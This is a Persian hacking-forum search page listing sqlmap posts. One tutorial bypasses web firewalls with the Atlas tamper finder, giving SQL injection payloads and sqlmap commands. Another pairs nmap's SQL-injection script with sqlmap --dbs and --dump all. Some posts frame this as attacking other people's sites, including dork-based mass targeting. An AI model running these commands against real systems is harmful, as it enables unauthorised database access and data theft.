جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'sqlmap'.
6 نتیجه پیدا شد
-
sqlmap sqlmap
sparta پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام توی sqlmap چطور میتونم یک دورک رو اسکن کنه بعد سایت هایی که پیدا کرده رو روش تست نفوذ انجام بدیم؟ -
اموزش sqlmap آموزش یافتن tamper مناسب برای sqlmap در زمان مواجهه با WAF
mownten پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
[سطح: متوسط] با عرض سلام و تبریک سال نو به کاربران عزیز من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas. امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست: $ git clone [Hidden Content] atlas $ cd atlas $ python atlas.py فرض کنیم لینک اسیب پذیر ما این هست: [Hidden Content] و پیلود ما هم اینه: -1234 AND 4321=4321-- AAAA برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید: $ python atlas.py --url [Hidden Content] --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v حالا این ابزار کجا و چه زمانی استفاده میشه؟ فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید: $ python sqlmap.py -u '[Hidden Content]' --dbs --random-agent -v 3 تصویر رو ببینید: در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده. پیلود : Price_ASC') AND 8716=4837 AND ('yajr'='yajr کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل: $ python atlas.py --url '[Hidden Content]' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v حالا نتیجه : میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه. پس از این تمپر بدین شکل استفاده می کنیم: $ python sqlmap.py -u '[Hidden Content]' --dbs --random-agent -v 3 --tamper=versionedkeywords لینک دریافت Atlas از Github: [Hidden Content] موفق باشید. سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید. Atlas-sqlmap-tamper-suggesy-master.zip-
- tamper finder
- sql inejction
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان امیدوارم این اموزش کمکتون کنه قبلش یه ادمین فایندر خوب همراه داشته باشید مفید استفاده کنین hack site ba SQL.webm
-
استفاده از NMAP به همراه SQLMAPبرای SQL Injection (تصویری)
d0kt0r پاسخی ارسال کرد برای یک موضوع در اسکنرها Scanners
سلام با این آموزش برای SQL Injection دیگه نیازی به خیلی از ابزار ها و اسکریپت ها نخواهید داشت هر دو ابزار NMap و SQLmap روی کالی لینوکس نصبه. در این آموزش برای تست ابزار ها از لینک های زیر استفاده میکنیم که میتونین برای تمرین استفاده کنین: www.vulnweb.com testphp.vulnweb.com *** در وارد کردن هدف //:https رو پاک کنید و فقط .www بمونه!!! *** 1. با استفاده از کامند زیر وب سایت هدف رو برای پیدا کردن باگ SQL مثله warning page اسکن کنید: nmap -sV -script=http-sql-injection address website -p 80 *سویچ sV- میگه که پورت باز رو برای یافتن سرویس و نسخه ی اون پروب کن. *سویچ script- میگه از اسکریپت های ابزار nmap برای سکن هدف استفاده کن.(مثله : اسکنر باگ SQL) *سویچ p- هم میگه شماره پورت رو وارد کن که اینجا 80.(چون پورتیه که در وبسرور، سرور بهش گوش میده). *به جای address website ادرس هدف رو وارد کنید که اینجا برای تست: testphp.php.vulnweb.com بعد از یک مدت مکس برای اسپایدر کردن هدف که مدتش بستگی به حجم و صفحات وبسایت داره لیست صفحات دارای باگ رو خواهید دید. برای مثال : 2.از کامندهای زیر هم به ترتیب برای دست رسی به دیتا بیس و استخراج(مشاهده کالم و تیبل ها و../) اطلاعات استفاده کنید: sqlmap -u address yafte shode --dbs sqlmap -u address yafte shode -D esme data base --dump all *سویچ u- برای وارد کردن ادرس هدف. *سویچ dbs-- برای مشاهده ی دیتابیس های موجود در هدف. *سویچ D- برای وارد کردن اسم دیتابیس مورد نظر که اینجا . (عکس های خودم رو بعدا وارد میکنم فعلا همین باشه.) سوالی بود بپرسید d0kt0r .-
- باگ sql
- sql injection
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
با سلام. یکی از باگ ها (ضعف امنیتی) شناختخ شده در میان هکر ها sql injection میباشد .متاسفانه این باگ در بیشتر سایت های اسیب پذیر یافت میشه و میتوان به جرات گفت که یکی از خطرناک ترین باگ های شناخته شده هست!!!!شما میتونید با استفاده از ابزار sqlmap در سیستم عامل کالی لینوکس سایت خودتون رو محک بزنید که ایا این اسیب پذیری در سایت شما هم وجود داره یا خیر.... خوب چون تاپیکی که در این رابطه زده شده بود ادامه پیدا نکرد یک آموزش جامع براتون آماده کردم. امیدوارم از این آموزش نهایت بهره رو برده باشید یا علی pass:guardiran.org sqlmap-hacking.part1.rar sqlmap-hacking.part2.rar
-
- learning sqlmap
- آموزش هک سایت با sqlmap
-
(و 35 مورد دیگر)
برچسب زده شده با :
- learning sqlmap
- آموزش هک سایت با sqlmap
- آموزش هک سایت با اس کیو ال مپ
- آموزش ابزار sqlmap
- sqlmap
- اس کیو ال اینجکشن
- هک
- هک سایت
- هک سرور
- sql injection
- sql
- hack
- hack server
- کالی
- کالی لینوکس
- kali
- kali linux
- hack website
- how
- how to hack
- pwk
- تست نفوذ با کالی لینوکس
- ضد هک
- لینوکس
- هک با کالی لینوکس
- kali learning
- how to hack with kali linux
- اموزش تست نفوذ با کالی لینوکس
- هک بانک
- hack windows
- server hacking
- learn hacking
- tutorial
- اموزش هک
- وای فای
- آموزش ابزار sqlmap در کالی لینوکس
- penetration testing with kali linux
-
درود در این تاپیک قصد دارم آموزش تصویری و کامل و مبتدی تا پیشرفته هک سایت و تست نفوذ ( Penetration testing with SqlMap Kali linux ) توسط یکی از بهترین ابزار های موجود در سیستم عامل کالی لینوکس Kali Linux OS بنام Sqlmap رو به شما آموزش بدم . همونطور که دوستان می دونند تارگتهایی که آسیب پذیر به باگ Sql Injection هستند رو می تونیم توسط ابزار Sqlmap مورد حمله قرار بدیم و در عرض چند دقیقه البته بستگی به تارگت داره و علم هکر اما خیلی سریعتر میشه بقول معروف یک سایت رو در عرض کمتر از 3 دقیقه هک کرد و نفوذ رو انجام داد و سعی می کنم توضیحات ساده تر و کاملتر باشه تا برای دوستانی که تازه به جمع هواداران علوم هکینگ و امنیت پیوستند قابل درک باشه . موفق باشین
- 18 پاسخ
-
- آموزش تصویری هک سایت در3 دقیق
- آموزش کامل sqlmapکالی لینوکس
- (و 8 مورد دیگر)